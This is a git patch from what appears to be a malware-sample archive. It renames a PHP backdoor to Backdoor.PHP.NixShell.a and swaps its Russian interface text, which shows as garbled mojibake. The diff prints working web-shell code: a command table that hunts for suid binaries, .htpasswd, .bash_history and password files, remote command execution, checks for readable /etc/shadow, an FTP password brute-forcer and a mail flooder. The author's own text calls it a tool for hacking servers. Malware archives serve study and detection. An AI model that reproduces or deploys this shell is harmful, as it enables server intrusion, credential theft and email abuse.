From 4516f77b78f07f0d2e9e6976170b7bdae3e70de6 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Thu, 15 Oct 2020 00:10:16 -0500 Subject: [PATCH] Rename Backdoor.PHP.Agent.an to Backdoor.PHP.NixShell.a Nixshell.a --- ...r.PHP.Agent.an => Backdoor.PHP.NixShell.a} | 526 +++++++++--------- 1 file changed, 263 insertions(+), 263 deletions(-) rename PHP/{Backdoor.PHP.Agent.an => Backdoor.PHP.NixShell.a} (62%) diff --git a/PHP/Backdoor.PHP.Agent.an b/PHP/Backdoor.PHP.NixShell.a similarity index 62% rename from PHP/Backdoor.PHP.Agent.an rename to PHP/Backdoor.PHP.NixShell.a index 7ea83ed6..5d5ffdb0 100644 --- a/PHP/Backdoor.PHP.Agent.an +++ b/PHP/Backdoor.PHP.NixShell.a @@ -50,13 +50,13 @@ A:hover {color:blue;TEXT-DECORATION: none} - -

[ ] *.NIX REMOTE WEB-SHELL -v.1.0 Stable [ ][ ]
-[ ][ ][ - ][ PHP- ][ ][ - ]
[ MySQL ][ ][ - ][ ][ ][ ][ /root ][ ]

+Â àäìèíêó +

[ Âïåðåä ] *.NIX REMOTE WEB-SHELL +v.1.0 Stable [ Íàçàä ][ Î ñêðèïòå ]
+[ Èíôîðìàöèÿ î ñèñòåìå ][ Íàâèãàöèÿ ][ Óñòàíîâêà +áåêäîðà ][ PHP-êîä ][ Çàãðóçêà ôàéëîâ ][ Èñïîëíåíèå +êîìàíä ]
[ MySQL ][ Îòïðàâêà ïèñüìà ][ Ìàèëôëóäåð + ][ Èíñòðóìåíòû ][ Äåìîíû ][ Àëüòåðíàòèâíûå ìåòîäû ][ /root ][ Óäàëèòü øåëë ]

'ls -la;pwd;uname -a', -' suid-' => 'find / -type f -perm -04000 -ls', -' sgid-' => 'find / -type f -perm -02000 -ls', -' sgid-' => 'find . -type f -perm -02000 -ls', -' config' => 'find / -type f -name "config*"', -' admin' => 'find / -type f -name "admin*"', -' config' => 'find . -type f -name "config*"', -' pass' => 'find . -type f -name "pass*"', -' , ' => 'find / -perm -2 -ls', -' , ' => 'find . -perm -2 -ls', -' service.pwd' => 'find . -type f -name service.pwd', -' service.pwd' => 'find / -type f -name service.pwd', -' .htpasswd' => 'find / -type f -name .htpasswd', -' .htpasswd' => 'find . -type f -name .htpasswd', -' .bash_history' => 'find / -type f -name .bash_history', -' .bash_history' => 'find . -type f -name .bash_history', -' .fetchmailrc' => 'find / -type f -name .fetchmailrc', -' .fetchmailrc' => 'find . -type f -name .fetchmailrc', -' ext2fs' => 'lsattr -va', -' ' => 'netstat -an | grep -i listen', -' php- password' =>'find / -name *.php | xargs grep -li password', -' 777' =>'find / -type d -perm 0777', -' ' =>'sysctl -a | grep version', -' ' =>'cat /proc/version', -' syslog.conf' =>'cat /etc/syslog.conf', -' Message of the day' =>'cat /etc/motd', -' hosts' =>'cat /etc/hosts', -' 1' =>'cat /etc/issue.net', -' 2' =>'cat /etc/*-realise', -' ' =>'ps auxw', -' ' =>'ps ux', -' httpd.conf' =>'locate httpd.conf'); +'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî suid-áèòîì' => 'find / -type f -perm -04000 -ls', +'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find / -type f -perm -02000 -ls', +'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find . -type f -perm -02000 -ls', +'ïîèñê íà ñåðâåðå ôàéëîâ config' => 'find / -type f -name "config*"', +'ïîèñê íà ñåðâåðå ôàéëîâ admin' => 'find / -type f -name "admin*"', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config' => 'find . -type f -name "config*"', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ pass' => 'find . -type f -name "pass*"', +'ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find / -perm -2 -ls', +'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find . -perm -2 -ls', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd', +'ïîèñê íà ñåðâåðå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd', +'ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd', +'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history', +'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc', +'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc', +'âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va', +'ïðîñìîòð îòêðûòûõ ïîðòîâ' => 'netstat -an | grep -i listen', +'ïîèñê âñåõ php-ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password', +'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777', +'Îïðåäåëåíèå âåðñèè ÎÑ' =>'sysctl -a | grep version', +'Îïðåäåëåíèå âåðñèè ÿäðà' =>'cat /proc/version', +'Ïðîñìîòð syslog.conf' =>'cat /etc/syslog.conf', +'Ïðîñìîòð Message of the day' =>'cat /etc/motd', +'Ïðîñìîòð hosts' =>'cat /etc/hosts', +'Âåðñèÿ äèñòðèáóòèâà 1' =>'cat /etc/issue.net', +'Âåðñèÿ äèñòðèáóòèâà 2' =>'cat /etc/*-realise', +'Ïîêàçàòü âñå ïðîöåñû' =>'ps auxw', +'Ïðîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux', +'Ïîèñê httpd.conf' =>'locate httpd.conf'); @@ -181,7 +181,7 @@ while(!feof($socket)) $buffer.=fread($socket, 1024); $file_size=strlen($buffer); $f=fopen($loadnewname,"wb+"); fwrite($f, $buffer, $file_size); -echo " : $file_size

" ; +echo "Ðàçìåð çàãðóæåííîãî ôàéëà: $file_size

" ; } if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} @@ -214,7 +214,7 @@ if (($_POST['alias']) AND ($_POST['alias']!=="")) } -echo " : ".$_POST['cmd'].""; +echo "Âûïîëíåííàÿ êîìàíäà: ".$_POST['cmd'].""; echo ""; echo "
-
+ $tend HTML; -// , ? =) +// íèêàêàÿ ïðîâåðêà íå äåëàåòñÿ, à çà÷åì ? =) if (isset($submit)) { mail($tomailz,$mailtema,$mailtext,"From: $frommail"); -echo "

!

"; +echo "

Ñîîáùåíèå îòïðàâëåíî!

"; } break; -// +// Èíôîðìàöèÿ î ñèñòåìå case "info": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; - $hsafemode = ""; + $hsafemode = "Âêëþ÷åíî"; } -else {$safemode = false; $hsafemode = "";} +else {$safemode = false; $hsafemode = "Îòêëþ÷åíî";} /* display information */ -echo "[ ]
"; -echo ": ".$_SERVER["HTTP_HOST"]."
" ; -echo "IP : ".gethostbyname($_SERVER["HTTP_HOST"])."
"; -echo " : ".$_SERVER['SERVER_SIGNATURE']." "; +echo "[ Èíôîðìàöèÿ î ñèñòåìå ]
"; +echo "Õîñò: ".$_SERVER["HTTP_HOST"]."
" ; +echo "IP ñåðâåðà: ".gethostbyname($_SERVER["HTTP_HOST"])."
"; +echo " Ñåðâåð: ".$_SERVER['SERVER_SIGNATURE']." "; echo "OC: ".exec("uname -a")."("; print "".php_uname()." )
\n"; -echo ": ".exec("cat /proc/cpuinfo | grep GHz")."
"; -echo ": ".exec("id")."
"; -echo " : " . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . ": " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB
"; -echo " :".exec("pwd").""; -echo "
web-: ".@$_SERVER['PHP_SELF']." "; -echo "
IP: ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
"; +echo "Ïðîöåññîð: ".exec("cat /proc/cpuinfo | grep GHz")."
"; +echo "Ïðèâèëåãèè: ".exec("id")."
"; +echo "Âñåãî ìåñòà: " . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "Ñâîáîäíî: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB
"; +echo "Òåêóùèé êàòàëîã:".exec("pwd").""; +echo "
Òåêóøèé web-ïóòü: ".@$_SERVER['PHP_SELF']." "; +echo "
Òâîé IP: ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
"; echo "PHP version: ".phpversion()."
"; -echo " ID : ".get_current_user()."
"; +echo " ID âëàäåëüöà ïðîöåñà: ".get_current_user()."
"; echo "MySQL : ".mysql_get_server_info()."
"; if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){ -print ' /etc/passwd!
'; +print 'Åñòü äîñòóï ê /etc/passwd!
'; } if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){ -print ' /etc/shadow!
'; +print 'Åñòü äîñòóï ê /etc/shadow!
'; } if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){ -print ' /etc/shadow-! '; +print 'Åñòü äîñòóï ê /etc/shadow-! '; } if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){ -print ' /etc/master.passwd!
'; +print 'Åñòü äîñòóï ê /etc/master.passwd!
'; } if(isset($_POST['th']) && $_POST['th']!=''){ chdir($_POST['th']); @@ -762,13 +762,13 @@ chdir($_POST['th']); if(is_writable('/tmp/')){ $fp=fopen('/tmp/qq8',"w+"); fclose($fp); -print "/tmp -  
\n"; +print "/tmp - îòêðûòà 
\n"; unlink('/tmp/qq8'); } else{ -print "/tmp -
"; +print "/tmp - íå îòêðûòà
"; } -echo " : ".$hsafemode."
"; +echo "Áåçîïàñíûé ðåæèì: ".$hsafemode."
"; if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} @@ -785,30 +785,30 @@ if ($nixpasswd) else {echo "
Get /etc/passwd
";} if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";} - if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo " Apache (httpd.conf)
";} - { echo " Apache (httpd.conf)
";} - if (file_get_contents("/etc/httpd.conf")) {echo " Apache (httpd.conf)
";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} + { echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} + if (file_get_contents("/etc/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} if (file_get_contents("/etc/httpd.conf")) {echo "cpanel log
";} break; -// +// Î ñêðèïòå case "about": -echo "
!

-- NWRS ! . . . . , - . , - . , , :) , php - . , , - . -, : Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous ( )... ... . !

: , :) .
"; -echo "


, :

+echo "
Ïðèâåò âñåì!

+Íàêîíåö-òî NWRS äîñòóïåí â ïåðâîé ñòàáèëüíîé âåðñèè! Äîáàâèëîñü ìíîæåñòâî íîâûõ ïîëåçíûõ âîçìîæíîñòåé. Âñå ôóíêöèè ñêðèïòà ðàáîòàþò è ðàáîòàþò êîððåêòíî. Äîáàâëåíû óíèêàëüíûå èíñòðóìåíòû äëÿ âçëîìà ñåðâåðà.  òî æå âðåìÿ íåò íè÷åãî ëèøíåãî. Âñå, ÷òî çàäóìûâàëîñü - ðåàëèçèðîâàíî. Äóìàþ, êàæäûé íàéäåò â ñêðèïòå ÷òî-òî ïîëåçíîå äëÿ ñåáÿ. Òàêæå çàÿâëÿþ î òîì, ÷òî ÿ çàêðûâàþ ïðîåêò, èáî îí äîñòèã èäåàëà :) Ëþáîé ìîæåò åãî ïðîäîëæèòü, php - îòêðûòûé ÿçûê. Íà ïåðâûõ ïîðàõ ñêðèïò âîîáùå áûë òîëüêî ó íåñêîëüêèõ ÷åëîâåê óçêîãî êðóãà äðóçåé, ïèñàë åãî äëÿ ñåáÿ, èç-çà ñâîåé ïðèðîäíîé ëåíè. +Íó, è ñïàñèáî ýòèì ëþäÿì: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (îðôîãðàôèÿ è äèçàéí)... È ìíîãèì äðóãèì... Èõ èäåè î÷åíü ïîìîãëè âîïëîòèòü â æèçíü ñòîëü óíèâåðñàëüíûé èíñòðóìåíò. Îãðîìíîå ñïàñèáî èì!

Ïîìíèòå: èñïîëüçóÿ ýòîò ñêðèïò íà ÷óæèõ ñåðâåðàõ, âû íàðóøàåòå çàêîí :) Òàê ÷òî îñòîðîæíåå.
"; +echo "


Ïîñåòèòå ýòè ñàéòû, è âû âñåãäà áóäåòå â êóðñå ñîáûòèé:

www.ru24-team.net

www.web-hack.ru

www.rst.void.ru

www.hackru.info

www.realcoding.net

www.ccteam.ru

-, .
, , c :) -




GNU GPL
22 2005 . DreAmeRz
e-mail:
dreamerz@mail.ru ICQ: 817312 WEB: http://www.Ru24-Team.NET"; +Èçâèíÿþñü, åñëè êîãî çàáûë.
Àâòîð íå íåñåò îòâåòñòâåííîñòè çà ìàòåðèàëû, ðàçìåùåííûå íà ýòèõ ñàéòàõ, îcîáåííî íà ïîñëåäíåì :) +




Ñêðèïò ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GNU GPL
22 Èþëÿ 2005 ã. © DreAmeRz
e-mail:
dreamerz@mail.ru ICQ: 817312 WEB: http://www.Ru24-Team.NET"; break; -// +// ÔÒÏ ïîäáîð ïàðîëåé case "ftppass": $filename="/etc/passwd"; // passwd file @@ -828,7 +828,7 @@ $conn_id=ftp_connect($ftp_server); $login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass); if (($conn_id) && ($login_result)) { -echo " login:password - ".$ftp_user_name.":".$ftp_user_name."
"; +echo "Ïîäêëþ÷åíèå login:password - ".$ftp_user_name.":".$ftp_user_name."
"; ftp_close($conn_id);} else { echo $ftp_user_name." - error
"; @@ -841,7 +841,7 @@ case "ftp": echo " @@ -850,13 +850,13 @@ echo " - + - + +
Ëîã ñîõðàíÿåòñÿ â pass.txt @@ -914,7 +914,7 @@ function randpass($len) { return $s; } if (@unlink("pass.txt") < 0){ -echo " "; +echo "íè÷åãî íåò"; exit; } $file="pass.txt"; @@ -961,8 +961,8 @@ $p="$testing"; echo "
- login\password + Ïðîâåðèòü íà ñâÿçêó login\password
  FTP Host:
  Login:    
   :
  Êîëëè÷åñòâî ïàðîëåé:     <1000 pass
   :
  Ïàðîëü äëÿ ïðîâåðêè:     -
pass.txt
-
!!! .
-  : $host
  : $login
  : $password
+Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.
+  Êîííåêò: $host
  Ëîãèí: $login
  Ïàðîëü: $password ";exit; } elseif(preg_match("/530/",$text)){ @@ -974,7 +974,7 @@ $p="$testing"; }else{ echo " - +
ftp !!! $host 21 !
Íåâåðíî óêàçàí ftp õîñòèíãà!!! Íà $host çàêðûò 21 ïîðò!
";exit; } @@ -997,11 +997,11 @@ break; // MailFlud case "mailfluder": -$email=$_POST['email']; // -$from=$_POST['from']; // -$num=$_POST['num']; // -$text=$_POST['text']; // -$kb=$_POST['kb']; // (kb) +$email=$_POST['email']; // Ìûëî æåðòâû +$from=$_POST['from']; // Ìûëî æåðòâû +$num=$_POST['num']; // ×èñëî ïèñåì +$text=$_POST['text']; // Òåêñò ôëóäà +$kb=$_POST['kb']; // Âåñ ïèñüìà (kb) ?>